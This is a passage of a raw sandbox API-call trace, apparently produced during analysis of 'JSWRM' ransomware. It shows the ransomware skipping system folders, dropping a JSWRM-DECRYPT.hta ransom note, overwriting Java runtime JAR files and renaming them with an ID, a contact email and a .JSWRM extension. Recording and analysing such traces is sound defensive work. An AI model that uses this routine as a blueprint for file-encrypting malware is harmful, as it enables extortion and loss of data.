Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0070.069] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ext", cAlternateFileName="")) returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2=".") returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="..") returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="...") returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="windows") returned -1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="recovery") returned -1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="perflogs") returned -1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="documents and settings") returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="$RECYCLE.BIN") returned 1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="system volume information") returned -1 [0070.069] lstrcmpiW (lpString1="ext", lpString2="msocache") returned -1 [0070.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0070.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0070.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0070.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0070.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0070.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jswrm-decrypt.hta")) returned 0xffffffff [0070.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0070.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0070.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0070.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0070.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0070.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0070.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.072] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.075] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.075] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0070.076] CloseHandle (hObject=0x454) returned 1 [0070.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0070.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0070.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0070.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0070.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jswrm-decrypt.hta")) returned 0x20 [0070.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0070.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0070.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0070.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x206d31c2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0070.077] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.077] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x206d31c2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0070.078] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.078] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.078] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2de78, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="access-bridge-64.jar", cAlternateFileName="ACCESS~1.JAR")) returned 1 [0070.078] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2=".") returned 1 [0070.078] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="..") returned 1 [0070.078] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="...") returned 1 [0070.078] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="windows") returned -1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="recovery") returned -1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="perflogs") returned -1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="documents and settings") returned -1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="system volume information") returned -1 [0070.079] lstrcmpiW (lpString1="access-bridge-64.jar", lpString2="msocache") returned -1 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-64.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-64.jar", cchWideChar=20, lpMultiByteStr=0x241358, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="access-bridge-64.jar", lpUsedDefaultChar=0x0) returned 20 [0070.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-64.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-64.jar", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="access-bridge-64.jar", lpUsedDefaultChar=0x0) returned 20 [0070.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0070.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0070.079] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.080] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=188024) returned 1 [0070.080] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.081] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.093] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.093] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.093] CloseHandle (hObject=0x458) returned 1 [0070.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0070.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0070.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0070.100] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cldrdata.jar", cAlternateFileName="")) returned 1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2=".") returned 1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="..") returned 1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="...") returned 1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="windows") returned -1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="recovery") returned -1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="perflogs") returned -1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="documents and settings") returned -1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="system volume information") returned -1 [0070.100] lstrcmpiW (lpString1="cldrdata.jar", lpString2="msocache") returned -1 [0070.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cldrdata.jar", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cldrdata.jar", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cldrdata.jar", lpUsedDefaultChar=0x0) returned 12 [0070.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0070.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cldrdata.jar", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cldrdata.jar", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cldrdata.jar", lpUsedDefaultChar=0x0) returned 12 [0070.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0070.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0070.101] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.101] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3860502) returned 1 [0070.101] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.101] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.114] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.114] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.114] CloseHandle (hObject=0x458) returned 1 [0070.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0070.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0070.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0070.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0070.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0070.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0070.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0070.115] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x205e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="dnsns.jar", cAlternateFileName="")) returned 1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2=".") returned 1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2="..") returned 1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2="...") returned 1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2="windows") returned -1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2="recovery") returned -1 [0070.115] lstrcmpiW (lpString1="dnsns.jar", lpString2="perflogs") returned -1 [0070.116] lstrcmpiW (lpString1="dnsns.jar", lpString2="documents and settings") returned -1 [0070.116] lstrcmpiW (lpString1="dnsns.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.116] lstrcmpiW (lpString1="dnsns.jar", lpString2="system volume information") returned -1 [0070.116] lstrcmpiW 